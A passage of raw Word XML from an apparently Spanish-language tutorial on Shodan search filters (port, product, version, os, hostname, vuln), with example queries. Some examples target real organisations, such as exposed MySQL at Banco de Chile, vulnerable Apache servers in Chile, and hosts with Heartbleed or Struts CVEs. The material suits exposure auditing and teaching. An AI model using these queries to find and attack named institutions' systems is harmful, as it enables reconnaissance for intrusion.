                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A47D8E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00A47D8E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Todos los dispositivos en esa subred</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E69185C" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3895A6" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRPr="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="000951E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47D8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip: - IP específica (alias de ne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4C50" w14:paraId="06315616" w14:textId="77777777" w:rsidTr="00644C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E0412F" w14:textId="4FE7B5C3" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="00A47D8E">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00644C50">
              <w:t>ip:8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52037E34" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58169160" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="000951E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644C50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>org: - Organización/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4C50" w14:paraId="149DD004" w14:textId="77777777" w:rsidTr="00644C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A915860" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:r w:rsidRPr="00644C50">
              <w:t>org:"Telefonica Chile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456A286E" w14:textId="04F80F8E" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00644C50">
              <w:t>org:"Universidad de Chile"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6337F63F" w14:textId="77777777" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC02978" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="000951E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644C50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isp: - Proveedor de intern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4C50" w14:paraId="2C6A5884" w14:textId="77777777" w:rsidTr="00644C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E863DDE" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:r w:rsidRPr="00644C50">
              <w:t>isp:"Claro"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A78EEB5" w14:textId="7F005D5D" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00644C50">
              <w:t>isp:"Movistar"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C8D583E" w14:textId="77777777" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D133E3" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="000951E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644C50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asn: - Número de sistema autóno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4C50" w14:paraId="0EF24D3F" w14:textId="77777777" w:rsidTr="00644C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717C1157" w14:textId="77777777" w:rsidR="00644C50" w:rsidRPr="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:r w:rsidRPr="00644C50">
              <w:t>asn:AS15169</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADF98B6" w14:textId="3FB225F3" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00644C50">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00644C50">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00644C50">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Todo lo que pertenece a Google</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49A8EB7F" w14:textId="77777777" w:rsidR="00644C50" w:rsidRDefault="00644C50" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432268A9" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="00444666" w:rsidRDefault="00444666" w:rsidP="00444666">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uso práct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4666" w14:paraId="478B245B" w14:textId="77777777" w:rsidTr="00444666">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C6AFF9" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="00444666" w:rsidRDefault="00444666" w:rsidP="00444666">
            <w:r w:rsidRPr="00444666">
              <w:t>port:3306 org:"Banco de Chile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08769051" w14:textId="18599E94" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="00444666">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00444666">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00444666">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bases de datos MySQL expuestas del Banco de Chile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B40EE42" w14:textId="77777777" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F3705D" w14:textId="6C52838C" w:rsidR="00444666" w:rsidRDefault="00444666">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TROS TECNICOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33776099" w14:textId="2EE91B24" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="005C3E51">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port:</w:t>
      </w:r>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Puerto especí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4666" w14:paraId="408FB5F6" w14:textId="77777777" w:rsidTr="00444666">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E5E5E1" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="005C3E51" w:rsidRDefault="00444666" w:rsidP="005C3E51">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">port:22      </w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> SSH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B0B265" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="005C3E51" w:rsidRDefault="00444666" w:rsidP="005C3E51">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">port:3306    </w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> MySQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B89560" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="005C3E51" w:rsidRDefault="00444666" w:rsidP="005C3E51">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">port:27017   </w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> MongoDB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6F013F" w14:textId="2B473EB2" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="005C3E51">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">port:5900    </w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="005C3E51">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E079A30" w14:textId="77777777" w:rsidR="00444666" w:rsidRPr="00444666" w:rsidRDefault="00444666" w:rsidP="005C3E51">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>product:</w:t>
      </w:r>
      <w:r w:rsidRPr="00444666">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Software/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9C1" w:rsidRPr="00B941CC" w14:paraId="2104E934" w14:textId="77777777" w:rsidTr="00C569C1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642EDB05" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>product:Apache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749545BA" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>product:nginx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783193ED" w14:textId="1DA0D487" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>product:MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3883E759" w14:textId="77777777" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="00444666">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EA98D6" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00FD4740">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C569C1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>version:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C569C1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Versión del 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9C1" w14:paraId="4E763E19" w14:textId="77777777" w:rsidTr="00C569C1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DFF1931" w14:textId="6220C033" w:rsidR="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00444666">
            <w:pPr>
              <w:pStyle w:val="whitespace-normal"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>product:Apache version:2.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C66D239" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00FD4740">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C569C1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C569C1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Sistema oper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9C1" w:rsidRPr="00C569C1" w14:paraId="7DC0C162" w14:textId="77777777" w:rsidTr="00C569C1">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C19C114" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:t>os:Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2310F06A" w14:textId="77777777" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:t>os:"Ubuntu"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783754E5" w14:textId="5BE3C54F" w:rsidR="00C569C1" w:rsidRPr="00C569C1" w:rsidRDefault="00C569C1" w:rsidP="00C569C1">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="00C569C1">
              <w:t>os:"CentOS"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509594B7" w14:textId="77777777" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00FD4740">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73C8F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostname:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73C8F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Nombre de host comple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3C8F" w:rsidRPr="00B941CC" w14:paraId="608704C8" w14:textId="77777777" w:rsidTr="00C73C8F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18C61C4B" w14:textId="77777777" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00C73C8F">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C73C8F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hostname:admin.empresa.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4AB824" w14:textId="03383B26" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00C73C8F">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C73C8F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hostname:*.gov</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B27E40A" w14:textId="389B6D64" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00444666">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73C8F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uso práctico combin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3C8F" w14:paraId="19D0F1C7" w14:textId="77777777" w:rsidTr="00C73C8F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625146FD" w14:textId="77777777" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00C73C8F">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="00C73C8F">
              <w:t>product:Apache version:2.2.15 country:CL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A41BF3" w14:textId="631D4501" w:rsidR="00C73C8F" w:rsidRDefault="00C73C8F" w:rsidP="00C73C8F">
            <w:pPr>
              <w:pStyle w:val="Sinespaciado"/>
            </w:pPr>
            <w:r w:rsidRPr="00C73C8F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00C73C8F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Servidores Apache vulnerables en Chile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EBC0047" w14:textId="77777777" w:rsidR="00875709" w:rsidRPr="00C73C8F" w:rsidRDefault="00875709" w:rsidP="00444666">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC86384" w14:textId="344E0EEE" w:rsidR="00C73C8F" w:rsidRPr="00C73C8F" w:rsidRDefault="00C73C8F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73C8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FILTROS DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27A5D8" w14:textId="77777777" w:rsidR="00E41912" w:rsidRDefault="00E41912" w:rsidP="00C1529C">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vuln:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - CVE especí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1912" w14:paraId="1C68217C" w14:textId="77777777" w:rsidTr="00E41912">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CEAAA93" w14:textId="77777777" w:rsidR="00E41912" w:rsidRPr="00E41912" w:rsidRDefault="00E41912" w:rsidP="00E41912">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vuln:CVE-2014-0160</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719E8E8F" w14:textId="77777777" w:rsidR="00E41912" w:rsidRPr="00E41912" w:rsidRDefault="00E41912" w:rsidP="00E41912">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Dispositivos con Heartbleed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ACFF6E3" w14:textId="77777777" w:rsidR="00E41912" w:rsidRPr="00E41912" w:rsidRDefault="00E41912" w:rsidP="00E41912">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="473F54E1" w14:textId="77777777" w:rsidR="00E41912" w:rsidRPr="00E41912" w:rsidRDefault="00E41912" w:rsidP="00E41912">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vuln:CVE-2017-5638</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9A3175" w14:textId="63A823A9" w:rsidR="00E41912" w:rsidRDefault="00E41912" w:rsidP="00E41912">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00E41912">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Apache Struts vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C94BC6C" w14:textId="77777777" w:rsidR="00444666" w:rsidRDefault="00444666" w:rsidP="00A47D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
